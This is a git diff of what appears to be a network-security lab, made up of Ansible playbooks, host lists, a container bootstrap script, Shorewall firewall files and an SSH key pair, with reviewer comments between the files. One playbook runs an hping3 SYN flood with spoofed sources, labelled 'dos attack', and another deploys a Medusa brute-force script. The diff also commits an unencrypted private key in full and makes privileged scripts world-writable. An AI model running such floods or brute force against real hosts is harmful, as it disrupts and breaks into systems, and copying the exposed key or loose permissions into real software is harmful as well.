+1,5 @@ +172.27.0.2 +172.27.0.3 +172.27.0.4 +172.27.0.5 +172.27.0.6 diff --git a/project/test-ping.yml b/project/test-ping.yml new file mode 100644 index 0000000..c08c86f --- /dev/null +++ b/project/test-ping.yml 
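Review bot: project/second_script.sh is added with mode 100755 but has no interpreter line, so which shell runs it depends on the caller, while project/sshkey_script.sh in the same commit does start with `#!/bin/bash`. Add a first line such as `#!/bin/sh`, and a one-line comment saying that it runs `test2.yml` against `inventory_w.yml` and prompts for the SSH and become passwords.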
@@ -0,0 +1,27 @@
+---
+- hosts: service
+ remote_user: docker
+ sudo: yes
+ gather_facts: no
+ vars:
+ user: "docker"
+
+
+
+ tasks:
+
+
+
+ # ping async
+ - name: pingtome
+ command: ping 10.80.0.2
+ async: 30
+ poll: 0
+
+
+
+
+ - name: Refresh connection
+ meta: clear_host_errors
+
+
diff --git a/project/test.retry b/project/test.retry
new file mode 100644
index 0000000..75048d0
--- /dev/null
+++ b/project/test.retry
@@ -0,0 +1,5 @@
+172.27.0.2
+172.27.0.3
+172.27.0.4
+172.27.0.5
+172.27.0.6
diff --git a/project/test.yml b/project/test.yml
new file mode 100644
index 0000000..bbb2829
--- /dev/null
+++ b/project/test.yml
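Review bot: The play-level `sudo: yes` in project/test-ping.yml is the legacy privilege-escalation keyword; Ansible replaced it with `become`, and as far as I know newer releases no longer accept `sudo:` at all, so this header should read `become: yes`. The same header is repeated in test.yml, test2.yml, test3.yml, test_fail2ban.yml and test_iptables_rules.yml. The `pingtome` task also runs `ping 10.80.0.2` with no packet count and relies on `async: 30` to end it; `command: ping -c 10 10.80.0.2` makes the task finite on its own. The `vars: user` entry is not referenced anywhere in this play.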
@@ -0,0 +1,113 @@
+---
+- hosts: service
+ remote_user: docker
+ sudo: yes
+ gather_facts: no
+ vars:
+ user: "docker"
+
+
+
+ tasks:
+
+
+
+ # make directory
+
+ - name: make dir for data
+ become: true
+ file:
+ path: "/var/lab/playground/playground-readmongo"
+ state: directory
+ owner: docker
+ group: docker
+ mode: '0777'
+
+ # pare google.com
+
+# - name: google.com
+# become: yes
+# become_user: "{{ user }}"
+# command: curl http://www.google.com
+# ignore_errors: yes
+# register: configwww
+
+# - name: ls configwww
+# debug: var=configwww.stdout_lines
+
+
+ # rm dir
+
+# - name: remove dir
+# become: yes
+# become_user: "{{ user }}"
+# command: rmdir new_dir
+# ignore_errors: yes
+# register: rmvdir
+
+
+# - name: ls rmvdir
+# debug: var=rmvdir.stdout_lines
+
+ # transfer script iptables gia er. 1
+
+ - name: Transfer script iptables_rules.
+ copy: src=iptables_rules.sh dest=/home/docker mode=0777
+
+ # transfer script fail2ban gia er.2
+
+ - name: Transfer script fail2ban.
+ copy: src=fail2ban_script.sh dest=/home/docker mode=0777
+
+ # install openvpn gia er.4
+ - name: Ansible apt install openvpn.
+ become: true
+ apt:
+ name: openvpn
+ state: present
+ update_cache: true
+
+ # install fail2ban gia er.2
+ - name: Ansible apt install fail2ban.
+ become: true
+ apt:
+ name: fail2ban
+ state: present
+ update_cache: true
+
+ # ls -al for testing
+
+ - name: ls -al
+ become: yes
+ become_user: "{{ user }}"
+ command: ls -al #/etc
+ ignore_errors: yes
+ register: config
+
+
+ - name: ls config
+ debug: var=config.stdout_lines
+
+
+
+ # netstat -antlupe
+
+# - name: netstat
+# become: yes
+# become_user: "{{ user }}"
+# command: netstat -antlupe
+# ignore_errors: yes
+# register: ant
+
+
+
+# - name: ls ant
+# debug: var=ant.stdout_lines
+
+
+
+
+ - name: Refresh connection
+ meta: clear_host_errors
+
+
diff --git a/project/test2.retry b/project/test2.retry
new file mode 100644
index 0000000..db790ad
--- /dev/null
+++ b/project/test2.retry
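Review bot: `iptables_rules.sh` and `fail2ban_script.sh` are copied to /home/docker with `mode=0777`, and test_iptables_rules.yml and test_fail2ban.yml later run them with `sh` in plays that set `sudo: yes`, so any local account on the host can rewrite a script that is then executed with elevated rights. The `make dir for data` task has the same world-writable `mode: '0777'`, and test2.yml repeats the pattern for `script_update.sh` and `medusa_script.sh`. Give the scripts a root owner and no write bit for others, for example `copy: src=iptables_rules.sh dest=/home/docker owner=root group=root mode=0750`, and use `mode: '0750'` on the directory. The two apt tasks could also be a single task with `name: [openvpn, fail2ban]`.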
@@ -0,0 +1,4 @@
+172.27.0.3
+172.27.0.4
+172.27.0.5
+172.27.0.6
diff --git a/project/test2.yml b/project/test2.yml
new file mode 100644
index 0000000..6c494e5
--- /dev/null
+++ b/project/test2.yml
@@ -0,0 +1,76 @@
+---
+- hosts: service
+ remote_user: docker
+ sudo: yes
+ gather_facts: no
+ vars:
+ user: "docker"
+
+ tasks:
+
+
+ # ls -al test
+
+# - name: ls -al
+# become: yes
+# become_user: "{{ user }}"
+# command: ls -al
+# ignore_errors: yes
+# register: config
+
+# - name: ls config
+# debug: var=config.stdout_lines
+
+
+ # transfer script update
+
+ - name: Transfer script.
+ copy: src=script_update.sh dest=/home/docker mode=0777
+
+ # exec script
+ - name: Exec script_update.
+ command: sh /home/docker/script_update.sh
+
+ # transfer script iptables
+
+# - name: Transfer script iprules.
+# copy: src=iptables_rules.sh dest=/home/docker mode=0777
+
+ # transfer script imedusa
+
+ - name: Transfer script medusa.
+ copy: src=medusa_script.sh dest=/home/docker mode=0777
+
+ # transfer script fail2ban
+
+# - name: Transfer script fail2ban.
+# copy: src=fail2ban_script.sh dest=/home/docker mode=0777
+
+ # transfer script sshkey_script
+
+# - name: Transfer script sshkey.
+# copy: src=sshkey_script.sh dest=/home/docker mode=0777
+
+
+ # install hping3
+ - name: Ansible apt install hping3.
+ become: true
+ apt:
+ name: hping3
+ state: present
+ update_cache: true
+
+ # install sshpass
+ - name: Ansible apt install sshpass.
+ become: true
+ apt:
+ name: sshpass
+ state: present
+ update_cache: true
+
+
+ # refresh
+ - name: Refresh connection
+ meta: clear_host_errors
+
+
diff --git a/project/test3.retry b/project/test3.retry
new file mode 100644
index 0000000..f23db12
--- /dev/null
+++ b/project/test3.retry
@@ -0,0 +1,4 @@
+172.29.0.3
+172.29.0.4
+172.29.0.5
+172.29.0.6
diff --git a/project/test3.yml b/project/test3.yml
new file mode 100644
index 0000000..c4492c5
--- /dev/null
+++ b/project/test3.yml
@@ -0,0 +1,60 @@
+---
+- hosts: service
+ remote_user: docker
+ sudo: yes
+ gather_facts: no
+ vars:
+ user: "docker"
+
+
+
+ tasks:
+
+
+
+
+ # ls -al
+
+# - name: ls -al
+# become: yes
+# become_user: "{{ user }}"
+# command: ls -al
+# ignore_errors: yes
+# register: config2
+
+
+# - name: ls config2
+# debug: var=config2.stdout_lines
+
+ # dos attack async
+ - name: dos attack
+ command: sudo hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.21.0.2 -y
+ async: 120
+ poll: 0
+
+
+
+
+ # ls -al
+
+# - name: ls -al
+# become: yes
+# become_user: "{{ user }}"
+# command: ls -al
+# ignore_errors: yes
+# register: config3
+
+
+ - name: ls config3
+ debug: var=config3.stdout_lines
+
+
+
+
+
+
+
+ - name: Refresh connection
+ meta: clear_host_errors
+
+
diff --git a/project/test_fail2ban.retry b/project/test_fail2ban.retry
new file mode 100644
index 0000000..75048d0
--- /dev/null
+++ b/project/test_fail2ban.retry
@@ -0,0 +1,5 @@
+172.27.0.2
+172.27.0.3
+172.27.0.4
+172.27.0.5
+172.27.0.6
diff --git a/project/test_fail2ban.yml b/project/test_fail2ban.yml
new file mode 100644
index 0000000..1b1540f
--- /dev/null
+++ b/project/test_fail2ban.yml
@@ -0,0 +1,21 @@
+---
+- hosts: service
+ remote_user: docker
+ sudo: yes
+ gather_facts: no
+ vars:
+ user: "docker"
+
+
+
+ tasks:
+
+ # exec script fail2ban
+ - name: Exec fail2ban_script.
+ command: sh /home/docker/fail2ban_script.sh
+
+
+ - name: Refresh connection
+ meta: clear_host_errors
+
+
diff --git a/project/test_iptables_rules.retry b/project/test_iptables_rules.retry
new file mode 100644
index 0000000..75048d0
--- /dev/null
+++ b/project/test_iptables_rules.retry
@@ -0,0 +1,5 @@
+172.27.0.2
+172.27.0.3
+172.27.0.4
+172.27.0.5
+172.27.0.6
diff --git a/project/test_iptables_rules.yml b/project/test_iptables_rules.yml
new file mode 100644
index 0000000..d9cfe44
--- /dev/null
+++ b/project/test_iptables_rules.yml
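Review bot: In project/test3.yml the `ls config3` debug task prints `config3.stdout_lines`, but the only task that registers `config3` is commented out just above it, so the variable is undefined when the play runs; restore the registering task or comment the debug task out as was done for `config2`. The `dos attack` task calls `sudo` inside `command:` rather than setting `become: true` on the task, and its target `172.21.0.2` is hard-coded, so nothing in the play confines the generated traffic to the lab network. Take the address from a variable and check it against the lab subnet in a preceding `assert` task before the load test is allowed to start.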
@@ -0,0 +1,21 @@
+---
+- hosts: service
+ remote_user: docker
+ sudo: yes
+ gather_facts: no
+ vars:
+ user: "docker"
+
+
+
+ tasks:
+
+ # exec script iptables
+ - name: Exec iptables_rules.sh.
+ command: sh /home/docker/iptables_rules.sh
+
+
+ - name: Refresh connection
+ meta: clear_host_errors
+
+
diff --git a/sec_bootstrap b/sec_bootstrap
new file mode 100755
index 0000000..d38b273
--- /dev/null
+++ b/sec_bootstrap
@@ -0,0 +1,72 @@
+#!/bin/sh
+
+ROLE="undefined"
+MPI_MASTER_SERVICE_NAME="sec_master"
+MPI_WORKER_SERVICE_NAME="sec_worker"
+HOSTNAMES="/etc/nethosts"
+
+#######################
+# ARGUMENTS PARSER
+
+while [ "$1" != "" ];
+do
+ PARAM=$(echo "$1" | awk -F= '{print $1}')
+ VALUE=$(echo "$1" | awk -F= '{print $2}')
+
+ case $PARAM in
+ role)
+ [ "$VALUE" ] && ROLE=$VALUE
+ ;;
+
+ sec_master_service_name)
+ [ "$VALUE" ] && MPI_MASTER_SERVICE_NAME=$VALUE
+ ;;
+
+ sec_worker_service_name)
+ [ "$VALUE" ] && MPI_WORKER_SERVICE_NAME=$VALUE
+ ;;
+ *)
+ echo "ERROR: unknown parameter \"$PARAM\""
+ exit 1
+ ;;
+ esac
+ shift
+done
+
+
+
+cat > /etc/opt/service_names <<- EOF
+MPI_MASTER_SERVICE_NAME=${MPI_MASTER_SERVICE_NAME}
+MPI_WORKER_SERVICE_NAME=${MPI_WORKER_SERVICE_NAME}
+EOF
+
+case $ROLE in
+ "master")
+
+ # Auto update default host file in background and dumb all output
+ auto_update_hosts "${HOSTNAMES}" > /dev/null 2>&1 &
+
+ # Start ssh server
+ /usr/sbin/sshd -D
+ ;;
+
+
+ "worker")
+
+ # Start ssh server in background
+ /usr/sbin/sshd -D &
+
+ # Keep trying to connect to master node and stay there indefinitely so that master node can see
+ # the connected hosts that are ready for MPI work
+ while sleep 1
+ do
+ # shellcheck disable=SC2086
+ ssh -T -o "StrictHostKeyChecking no" \
+ -i "${USER_HOME}/.ssh/id_rsa" \
+ ${USER}@${MPI_MASTER_SERVICE_NAME} \
+ "tail -f /dev/null"
+ done
+ ;;
+ *)
+ echo 'role argument only accepts "master" or "worker"'
+esac
diff --git a/shorewall/interfaces b/shorewall/interfaces
new file mode 100755
index 0000000..a475e93
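Review bot: The worker loop in sec_bootstrap connects with `-o "StrictHostKeyChecking no"`, which accepts whatever host answers as `${MPI_MASTER_SERVICE_NAME}` and so gives up protection against an impersonated master. Ship the master's host key in a `known_hosts` file, or at least use `-o "StrictHostKeyChecking accept-new"` so that a changed key is refused. `USER` and `USER_HOME` are never set in this script, so the command depends on the container environment providing them; a guard such as `: "${USER_HOME:?USER_HOME not set}"` before the loop fails early instead of retrying every second. The final `*)` branch only echoes, so an invalid role exits with status 0; add `exit 1` there as the argument parser already does.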
--- /dev/null
+++ b/shorewall/interfaces
@@ -0,0 +1,6 @@
+### Comments, comments, and more comments.
+#
+#ZONE INTERFACE BROADCAST OPTIONS
+#
+net eth0 detect tcpflags,nosmurfs
+#LAST LINE -- ADD YOUR ENTRIES BEFORE THIS ONE -- DO NOT REMOVE
diff --git a/shorewall/policy b/shorewall/policy
new file mode 100755
index 0000000..58798a0
--- /dev/null
+++ b/shorewall/policy
@@ -0,0 +1,11 @@
+### Comments, comments, and more comments.
+#SOURCE DEST POLICY LOG LEVEL LIMIT:BURST
+#
+net fw ACCEPT
+fw net ACCEPT
+
+net all DROP
+
+# THE FOLLOWING POLICY MUST BE LAST
+all all REJECT info
+#LAST LINE -- ADD YOUR ENTRIES ABOVE THIS LINE -- DO NOT REMOVE
diff --git a/shorewall/rules b/shorewall/rules
new file mode 100755
index 0000000..d59920c
--- /dev/null
+++ b/shorewall/rules
@@ -0,0 +1,11 @@
+#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/
+# PORT PORT(S) DEST LIMIT GROUP
+#ACCEPT net fw tcp 80
+#ACCEPT fw net tcp 80
+#ACCEPT net fw udp 53
+#ACCEPT fw net udp 53
+#REJECT net fw udp 53
+#REJECT fw net udp 53
+#ACCEPT net:14.15.16.112/27 fw icmp 8
+
+#LAST LINE -- ADD YOUR ENTRIES BEFORE THIS ONE -- DO NOT REMOVE
diff --git a/shorewall/zones b/shorewall/zones
new file mode 100755
index 0000000..62437de
--- /dev/null
+++ b/shorewall/zones
@@ -0,0 +1,6 @@
+### Comments, comments, and more comments.
+#ZONE TYPE OPTIONS IN OUT
+# OPTIONS OPTIONS
+fw firewall
+net ipv4
+#LAST LINE - ADD YOUR ENTRIES ABOVE THIS ONE - DO NOT REMOVE
diff --git a/ssh/id_rsa b/ssh/id_rsa
new file mode 100755
index 0000000..d88fa3c
--- /dev/null
+++ b/ssh/id_rsa
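Review bot: In shorewall/policy the line `net fw ACCEPT` accepts every connection from the network to the firewall host itself, so the later `net all DROP` never applies to traffic aimed at the host, and every entry in shorewall/rules is commented out. If the intent is a default-deny host firewall, make the policy `net fw DROP info` and allow only the services that are needed in shorewall/rules, for example `ACCEPT net fw tcp 22` for SSH. The four shorewall files are also added with mode 100755 although they are data files; 0644 is enough.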
@@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEpQIBAAKCAQEAoKG1DtjMXHDJfF59Y5nO7Yl38fkjRL1LQhF7RZKbGScWBNIW +foAS0wrd3wUnd5YMtIeiBj98H+V8IEn0ChAAxGfHXqqmmYlU6ABESINob+h70Bnm +UwiRbRnA64o3d9+cz2T8YLf+1p7///Z8LA8U+7rS+kvKvtYCQ9llDAxtbe39CxCs +2HASam3U6VArq9SdSqph5MudBaYhaxx4V8VDdXEhG2pimlh8e7zdPZ8AYbYLLDhq +Ytd+wn9azLXPQ3w/vC+Pn4taUBYnlERDY45vaVsPdnR+ao9ckMLUS6EwJVQmgMzB +2yyNCbPQYvRPL0rxoGstfCmmjY3EzOh6kEA6wwIDAQABAoIBAHqrAxnTdj0h5LyV +bCwjyWKdGHwxRj24UUCjGQCIdOlAcBA+X+863yVLpyQpS3qHnCxBZ/pdgOza02/V +CgilL/DNT/N7Xr7hoXWKvpqhv5+2atcA8GN4p5YplKpLYxCoM5guBo3V9UbxJY7T +LQB4hA25HmUGfE5AIHqwCfqpgufvIO1enhe1Vh/6l1FJqJuNj2pBGeXOyOMV95GN +xC5/BVytJIx2Rts5qtwpt5iPE3pKdsrWc71qACxk3dG8h9OZnuE3vuCg/Wp8jdwk +NHZ6nWlt0BbST3wN0pyTp6cqtZ0qqfSpZCVRegeQW5ENR9NaigDX6RADKRnms46J +ziDSZAECgYEA0WBDY47CA9Ej0Y2zBcV3x03cznSnxr7BVty32xbnNgxGF5jNUDdU +E2JwJs86sV75VV0fpgrbN45lBV/2ImefrPr4kJAIL2J4eyVdOTTT/DO9Tuw6NP8R +AYMZOzOlgFjx3arnjlOK5AicFseWFCXvezuAMPcGpImgw7xHHM3RcFcCgYEAxGa2 +T+J119HWf15kN7bx5RaUl9J4DvvE5oHtA7zsMPO2fRpfwXAb8yKwIXfZ7186frPb +jo3ZQykcPuJ3MldvTWEuUhY5W1HSF1sBJOPZHuRfQicv8Uj4Y1kWltQf4Ikb3Uyh +T0fZJul4HkPAo/Q65zIAtJ9tWukAP/lmnwO9VXUCgYEAiY62F4WmH/3ai4WOFX+b +5xxXsmhgBiozOc8/F7jfZNoBfuVMFqSTHz0wM784b2nXY+cPsPY2+jQaWMKoIgh0 +lqA4iDmotwD56OYubjQwBeU0PdLjlwfw805fWE7hMAa/uQPcp9xpRtIFQs4T4t7d +jNgVq5XQDm/BaHedPOZX8HcCgYEAuKpu31vqO7wUt/vTtUMx3JpHqxz9P/FgqPAf +H/WiC0EMJEMJKAO2c/z4qO9dHiJnCL0qQraDQw/DfClJtC7b+2DVwd8dnQyowscR +o1MNUmueWcAo5vEag6c/gx/+vQuOBJ1JyxaeSmUZSTOhTUeVns64NRz2IJWWY5Cn ++fn1KwUCgYEAjYYeQX/W+2r8SFipPQQi/36EqLPwko58C/sbJR0gySP6El7hNQRt +Sdmd9hfMXRR+VCZWmmzb6T4fc80XxteI9eANkZ7xhNuQe11EDvPqmc9WSF0s+l1T +eQnkt+an7Qv2prDSU6d1KlOrOuCXU8IhbkuffvRSYXwK9T79bTG8iIQ= +-----END RSA PRIVATE KEY----- diff --git a/ssh/id_rsa.pub b/ssh/id_rsa.pub new file mode 100755 index 0000000..f69cef1 --- /dev/null +++ b/ssh/id_rsa.pub 
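Review bot: ssh/id_rsa is an unencrypted RSA private key checked into the repository, so anyone who can read the repository can authenticate wherever the matching public key is authorised; it should be treated as disclosed, replaced by a key generated per deployment, and excluded with an ignore rule such as `ssh/id_rsa`. It is also added with mode 100755, and OpenSSH refuses a private key file that other users can read, so wherever this file is installed it needs `chmod 600`. sec_bootstrap in this commit reads `${USER_HOME}/.ssh/id_rsa`; whether that is this file is not visible here.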
@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCgobUO2MxccMl8Xn1jmc7tiXfx+SNEvUtCEXtFkpsZJxYE0hZ+gBLTCt3fBSd3lgy0h6IGP3wf5XwgSfQKEADEZ8deqqaZiVToAERIg2hv6HvQGeZTCJFtGcDrijd335zPZPxgt/7Wnv//9nwsDxT7utL6S8q+1gJD2WUMDG1t7f0LEKzYcBJqbdTpUCur1J1KqmHky50FpiFrHHhXxUN1cSEbamKaWHx7vN09nwBhtgssOGpi137Cf1rMtc9DfD+8L4+fi1pQFieURENjjm9pWw92dH5qj1yQwtRLoTAlVCaAzMHbLI0Js9Bi9E8vSvGgay18KaaNjcTM6HqQQDrD nlknguyen@NN-Ubuntu
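Review bot: The key comment `nlknguyen@NN-Ubuntu` names a user and host that appear nowhere else in the visible changes, which suggests this key pair was carried over from another project rather than generated for this one; if so, the matching private key is held outside this deployment. Generate a fresh pair for the lab and do not authorise this public key on any host. The file is added with mode 100755; 0644 is the usual mode for a public key.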